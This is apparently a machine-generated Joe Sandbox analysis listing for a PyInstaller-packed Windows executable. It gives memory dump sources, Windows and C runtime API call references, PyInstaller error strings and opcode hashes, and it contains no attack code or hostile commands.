                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                      • API String ID: 626452242-876015163
                                                                                                                      • Opcode ID: 95718de30d3073db1f7eec85e98843929599eb2002b09e47a4c9a36acb02de40
                                                                                                                      • Instruction ID: 991e8fc00a0d3e23406f830713655dbb03e6d62a53b6a6bfcae64e0ee9683035
                                                                                                                      • Opcode Fuzzy Hash: 95718de30d3073db1f7eec85e98843929599eb2002b09e47a4c9a36acb02de40
                                                                                                                      • Instruction Fuzzy Hash: 08313E72A443057BD7106E54AC41F1A7BD4EB84722F84063AFF58E72C0E6B5D90CB653
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6A6BD: _free.LIBCMT ref: 00F6A6E2
                                                                                                                      • _free.LIBCMT ref: 00F6A743
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A74E
                                                                                                                      • _free.LIBCMT ref: 00F6A759
                                                                                                                      • _free.LIBCMT ref: 00F6A7AD
                                                                                                                      • _free.LIBCMT ref: 00F6A7B8
                                                                                                                      • _free.LIBCMT ref: 00F6A7C3
                                                                                                                      • _free.LIBCMT ref: 00F6A7CE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
                                                                                                                      • Instruction ID: 8fc6fa305b51e44683b88a40dd04d519f63c6a23ae65a0e050bc05da06ccaf52
                                                                                                                      • Opcode Fuzzy Hash: b82a83029192d2ac4a41a466b2bc48d6a5028a36daab7583f2bc1eaf857da398
                                                                                                                      • Instruction Fuzzy Hash: D011FE71940B04FAD620BBB0CC47FDB77ECEF46700F444815B29ABA162DB6AB614AB51
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F56A09
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                      • API String ID: 1717984340-876015163
                                                                                                                      • Opcode ID: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
                                                                                                                      • Instruction ID: f6b8689687b20ebc945d1b9d33434f2a923bd80851c786a8e18e79a5d1098dfa
                                                                                                                      • Opcode Fuzzy Hash: 2c3675797e2d5a051f0bdd890d8dab492bf35425fdd33ac874b4b0ce718b0c17
                                                                                                                      • Instruction Fuzzy Hash: E7012237B8422237D66065657C06D8B7B948B91F73F054232FF2CE21C0E5A0C94A71E3
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00F522E9,00000000,?,?,?,00000400,?,00000000,?), ref: 00F565D3
                                                                                                                        • Part of subcall function 00F56A30: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00F5663C,00F8DC48,?,00001000,?,?), ref: 00F56A4A
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,00F522E9,00000000,?,?,?,00000400,?,00000000,?), ref: 00F565F2
                                                                                                                      Strings
                                                                                                                      • FormatMessageW, xrefs: 00F56601
                                                                                                                      • No error messages generated., xrefs: 00F565FC
                                                                                                                      • PyInstaller: FormatMessageW failed., xrefs: 00F5660E
                                                                                                                      • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 00F5663F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharErrorFormatLastMessageMultiWide
                                                                                                                      • String ID: FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                                                                                                                      • API String ID: 1653872744-3268588819
                                                                                                                      • Opcode ID: 42593e158f0bc9da27985fb996c9089100ffdbc07e085c1daaa7614a98c21f87
                                                                                                                      • Instruction ID: 1f636125cce33de7bb2841f722e93ae9be730101c59c41b42e1ff931251e752b
                                                                                                                      • Opcode Fuzzy Hash: 42593e158f0bc9da27985fb996c9089100ffdbc07e085c1daaa7614a98c21f87
                                                                                                                      • Instruction Fuzzy Hash: 110188747443446BF61C97149C47BAA32D69F98B46F80841DBB0DCA1C2FAE49908E757
                                                                                                                      APIs
                                                                                                                      • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00F64E36
                                                                                                                      • __fassign.LIBCMT ref: 00F6501B
                                                                                                                      • __fassign.LIBCMT ref: 00F65038
                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65080
                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F650C0
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F65168
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1735259414-0
                                                                                                                      • Opcode ID: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
                                                                                                                      • Instruction ID: ec4ae302011906a40fe076b6a8c749e50aa35ce109be9874808602e1185343b7
                                                                                                                      • Opcode Fuzzy Hash: 1a7edef9a2e473f89dde81f5d3efe6b78d59d84f00e00641ad273451c57e4397
                                                                                                                      • Instruction Fuzzy Hash: 3BC19C75D002589FCF15CFE8C880AEDBBB5AF09314F28416AE855FB242D631AE46DF60
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B23F
                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F5B24D
                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5B266
                                                                                                                      • SetLastError.KERNEL32(00000000,00F5B228,00F5B05F,00F5A0C5), ref: 00F5B2B8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3852720340-0
                                                                                                                      • Opcode ID: 76c167b015c32b378901a69e23af06eab384b079ac478070c3951f2d8805d3ec
                                                                                                                      • Instruction ID: 03de621223e499726134e827d4034e8e59c40bb8064c5b55b12ee0099b1d9d96
                                                                                                                      • Opcode Fuzzy Hash: 76c167b015c32b378901a69e23af06eab384b079ac478070c3951f2d8805d3ec
                                                                                                                      • Instruction Fuzzy Hash: E101B5329192156DE6162AB4BC95A6E3B54EB117B7F300229FF24451E1EF55480DB360
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,00000000,00F5218F,00000000,00000000,Failed to obtain/convert traceback!,?,?,?,00000000,00F52EDE,?,?), ref: 00F52013
                                                                                                                      • DialogBoxIndirectParamW.USER32(00000000,?,00000000,00F51D70,?), ref: 00F520CB
                                                                                                                        • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
                                                                                                                      • DeleteObject.GDI32(?), ref: 00F520FD
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000102), ref: 00F5210F
                                                                                                                      Strings
                                                                                                                      • Unhandled exception in script, xrefs: 00F5203C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam_free
                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                      • API String ID: 4039461714-2699770090
                                                                                                                      • Opcode ID: f50e41b2b33c4307503ff65714778dd97e952a53c79c8be51e6afa712859c6fd
                                                                                                                      • Instruction ID: 8a8f955bf7b9ae801b611a4617f04d003c3cf147d6d57f131e030d0f9d71f4fe
                                                                                                                      • Opcode Fuzzy Hash: f50e41b2b33c4307503ff65714778dd97e952a53c79c8be51e6afa712859c6fd
                                                                                                                      • Instruction Fuzzy Hash: 81311C71508344ABD724AF64CC4DB9FB7E8BF89705F00092ABB8893252D7789509EB53
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F5B464,00000000,00000FA0,00F8EFD4,00000000,?,00F5B58F,00000004,InitializeCriticalSectionEx,00F78F9C,InitializeCriticalSectionEx,00000000), ref: 00F5B433
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                      • Opcode ID: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
                                                                                                                      • Instruction ID: bfb00436f6f58c1fa964ffd32e11ea06ce6c322b2e68ff0c89c4159eed4c28ea
                                                                                                                      • Opcode Fuzzy Hash: 5ce524a4036252aee3644ccc48d6ac4964de901009f9fce16c89eba327acfaab
                                                                                                                      • Instruction Fuzzy Hash: EA11C232E41635ABDB32CF689C49B6D73A4AF01775F250120EE19E7281D770EE05B6D2
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F627FC
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F6280F
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00F627DC,?,?,00F627A4,?,?,?), ref: 00F62832
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
                                                                                                                      • Instruction ID: e653d90eb1f1f895340e8867e863371b1b11f3a331b6608098028bd9cbe03460
                                                                                                                      • Opcode Fuzzy Hash: 4f4aa37cbaba804fbb56d89cbb37c302ac2ac7de3fe95a4277c523cc798622ee
                                                                                                                      • Instruction Fuzzy Hash: 92F01C3194161CFBDB129BA0DD0AB9D7B79EB44766F144161E809A21A0CBB18F40FAD6
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F6D74F
                                                                                                                      • _free.LIBCMT ref: 00F6D91B
                                                                                                                      • _free.LIBCMT ref: 00F6D993
                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00F6DB54,?,?,00000000), ref: 00F6D9A5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 597776487-0
                                                                                                                      • Opcode ID: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
                                                                                                                      • Instruction ID: d825624d30430361a82a9d734e65692aca9072600b93619af88ae2d7305dddf3
                                                                                                                      • Opcode Fuzzy Hash: 11cb2e2517ef357f9062740e4738fe95859ca88b223a66d30342b10233e8c4f6
                                                                                                                      • Instruction Fuzzy Hash: 26A12472F00219AFDB10AFB4DC42ABE7BB8EF44720F144169E904A7191EB349E45FB91
                                                                                                                      APIs
                                                                                                                      • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00F5E887), ref: 00F5E977
                                                                                                                      • GetFileInformationByHandle.KERNEL32(?,?), ref: 00F5E9D1
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F5E887,?,000000FF,00000000,00000000), ref: 00F5EA5F
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5EA66
                                                                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F5EAA3
                                                                                                                        • Part of subcall function 00F5ED82: __dosmaperr.LIBCMT ref: 00F5EDB7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1206951868-0
                                                                                                                      • Opcode ID: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
                                                                                                                      • Instruction ID: f01c8a9091c9dd72ccf263a5a549be62fff9529a95c31a63c779c003bd53733b
                                                                                                                      • Opcode Fuzzy Hash: 76df95aa1384317f23b8c27d8ed51c292bc12d5cbdd1203b9e776b3204b55880
                                                                                                                      • Instruction Fuzzy Hash: E3416F75900204ABCB28DFB5DC459AFBBF9FF89311B00451DFA56D3211E7389A48EB10
                                                                                                                      APIs
                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00F51D8E
                                                                                                                      • GetWindowLongW.USER32(?,00000008), ref: 00F51DA4
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00F51DC3
                                                                                                                      • SetWindowLongW.USER32(?,00000008,?), ref: 00F51DDE
                                                                                                                      • EndDialog.USER32(?,?), ref: 00F51E17
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DialogLongWindow$InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1200242243-0
                                                                                                                      • Opcode ID: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
                                                                                                                      • Instruction ID: 72ef2eb52f5dba8eb74be57d405bb46dd8eddc84c8882c28aa4925ad534eed54
                                                                                                                      • Opcode Fuzzy Hash: 35951174aebc355fe0551280336abf48a79be2e1335c63e11f7031759b64025a
                                                                                                                      • Instruction Fuzzy Hash: 5011E0359042147BE6209B14EC0AFAF77A4FB45322F108C15FE85D62D1C6A5FCC5E6A2
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F6A66C
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F6A67E
                                                                                                                      • _free.LIBCMT ref: 00F6A690
                                                                                                                      • _free.LIBCMT ref: 00F6A6A2
                                                                                                                      • _free.LIBCMT ref: 00F6A6B4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
                                                                                                                      • Instruction ID: 8ce288f14cc29528a7c818f92535e100ec2e2837f3179d362b4bb0b382ad8418
                                                                                                                      • Opcode Fuzzy Hash: b70929b96e95927e7c76b1533aa10232e646dffb323cb7073ccf7f308a75ed94
                                                                                                                      • Instruction Fuzzy Hash: B4F03032904244AB8660EB68EC86C7A73EDEE407207A94805F018E7521CB75FCC0AFA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F5368D
                                                                                                                      • _strncpy.LIBCMT ref: 00F54D1D
                                                                                                                        • Part of subcall function 00F53630: _strncat.LIBCMT ref: 00F536B2
                                                                                                                      • _strncpy.LIBCMT ref: 00F54D46
                                                                                                                        • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533E8
                                                                                                                        • Part of subcall function 00F533E0: _strrchr.LIBCMT ref: 00F533F7
                                                                                                                      Strings
                                                                                                                      • SPLASH: Cannot extract requirement %s., xrefs: 00F54CD8
                                                                                                                      • SPLASH: Cannot find requirement %s in archive., xrefs: 00F54D8B
